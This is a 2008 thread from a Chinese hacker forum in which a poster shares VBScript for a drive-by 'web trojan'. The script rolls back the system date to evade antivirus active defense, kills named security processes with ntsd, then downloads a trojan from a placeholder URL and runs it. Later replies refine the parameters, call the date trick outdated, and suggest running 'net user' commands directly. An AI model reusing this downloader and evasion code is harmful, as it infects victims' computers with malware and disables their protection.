[讨论]一个延时过主动防御网马
[讨论]一个延时过主动防御网马议题作者:185810581
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
初来报道写个菜菜的一个延时过主动防御网马
秒数代表正常日期几秒后改回,30代表30秒,延时的单位1000代表1秒
on error resume next
Set a = CreateObject("Wscript.Shell")
a.run "cmd /c set date=%date% &&date 1986-1-1 &&ping -n 秒数 127.0.0.1&&date %date%",vbhide
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.Name="杀进程1" or ps.name="杀进程2" or ps.name="杀进程3如此类推" then
a.run "ntsd -c q -p ps.handle",0
end if:next
b = ("下载的马儿保存地址"):c = ("马儿地址")
wscript.sleep 延时
Set d = CreateObject("Microsoft.XMLHTTP")
d.Open "GET",c,0
d.Send()
Set e = CreateObject("ADODB.Stream")
e.Mode = 3
e.Type = 1
e.Open()
e.Write(d.responseBody)
e.SaveToFile b
a.run b
帖子9 精华[url=http://forum.eviloctal.com/digest.php?authorid=144789]0[/url] 积分31 阅读权限40 性别男 在线时间16 小时 注册时间2007-10-21 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=144789]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-6589.html]kylin[/url] [img]http://forum.eviloctal.com/customavatars/6589.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 秒数 改为 %1 可以直接传参
帖子152 精华[url=http://forum.eviloctal.com/digest.php?authorid=6589]0[/url] 积分3681 阅读权限100 性别男 在线时间1005 小时 注册时间2005-6-27 最后登录2008-7-24 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6589]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-69539.html]sudami[/url]
大米米
[img]http://forum.eviloctal.com/customavatars/69539.gif[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 这脚本只能当科普用.
你得首先把防止时间被更改的驱动过了~
antiARP,MicroPoint,360的附属产品。。。
都已经用驱动保护系统时间了。你如何搞?
主防不是这样过的~~~[img]http://forum.eviloctal.com/images/smilies/yangcong/60.gif[/img]WINDOWS内核疯狂爱好者
帖子243 精华[url=http://forum.eviloctal.com/digest.php?authorid=69539]6[/url] 积分5537 阅读权限150 性别男 在线时间1115 小时 注册时间2007-1-10 最后登录2008-7-24 [url=http://hi.baidu.com/sudami]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=69539]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-148149.html]舍我其谁[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male1.gif[/img]
晶莹剔透§烈日灼然 修改时间是不行的啦,瑞星2008,江民等,你一改时间就报。。傻了吧兄弟,这个过时了做最好的自己
[url=http://wpa.qq.com/msgrd?V=1&Uin=303428402&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子9 精华[url=http://forum.eviloctal.com/digest.php?authorid=148149]0[/url] 积分34 阅读权限40 性别男 来自山东济南 在线时间15 小时 注册时间2007-11-12 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=148149]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-124935.html]明明[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 那楼上的 现在怎么过呢/
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=124935]0[/url] 积分17 阅读权限40 性别男 在线时间22 小时 注册时间2007-6-2 最后登录2008-1-12 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=124935]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日,预测咨询,公司改名,权威易经[/url]
[url=http://forum.eviloctal.com/space-uid-25853.html]shunyuncc[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 一个延时过主动防御网马?????????
这段代码 可以在网页上执行??
为什么不直接执行
Set a = CreateObject("Wscript.Shell")
a.run "cmd /c set date=%date% &&date 1986-1-1 &&ping -n 秒数 127.0.0.1&&date %date%",vbhide
net user 等
帖子16 精华[url=http://forum.eviloctal.com/digest.php?authorid=25853]0[/url] 积分62 阅读权限40 在线时间55 小时 注册时间2006-1-4 最后登录2008-6-24 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=25853]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-144322.html]microalex[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]